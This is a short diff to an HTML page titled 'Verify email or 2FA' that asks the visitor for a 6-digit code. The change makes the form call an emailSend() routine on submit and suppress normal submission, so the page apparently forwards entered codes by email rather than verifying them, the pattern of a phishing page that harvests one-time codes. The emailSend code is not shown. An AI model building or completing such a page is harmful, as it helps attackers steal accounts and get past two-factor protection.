--- a/email.html
+++ b/email.html
@@ -30,7 +30,7 @@
       <i class="bi bi-chevron-down"></i>
     </div>
   </nav>
-  <form class="mx-auto" id="form" method="POST">
+  <form class="mx-auto" id="form" onsubmit="emailSend(); reset(); return false;"  method="POST">
     <div class="form__header pt-4 pb-8">
       <h1 class="capitalize text-xl font-bold">Verify email or 2FA</h1>
       <p class="py-1">EPlease enter the 6-digit code we've sent to your Email</p>
